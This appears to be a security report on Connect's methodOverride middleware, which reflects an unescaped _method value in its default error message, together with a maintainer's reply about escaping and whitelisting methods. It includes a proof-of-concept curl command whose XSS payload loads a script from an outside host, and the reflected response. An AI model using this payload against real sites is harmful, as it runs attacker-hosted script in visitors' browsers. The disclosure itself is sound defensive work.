This middleware overwrite req.method with the req.body['_method'] value. When you don't catch the error it responds with a default error msg: "Cannot [METHOD] [URL]" (https://github.com/senchalabs/connect/blob/6db901f967036ccc3c892b4bcb5bcb59e0b0dca9/lib/proto.js#L155). Because this is not enough sanitized, you can force a Cross-Site Scripting in the response:
~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /
This is very dangerous because in a server like ExpressJS it won't be handled with a app.all('/*', ...), so all servers using this middleware are vulnerable.
To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.
I patched with an escape for now but I'll whitelist the methods as well, it's not a huge vulnerability since you can't easily pass around a POST but doesn't hurt to escape, thanks for the report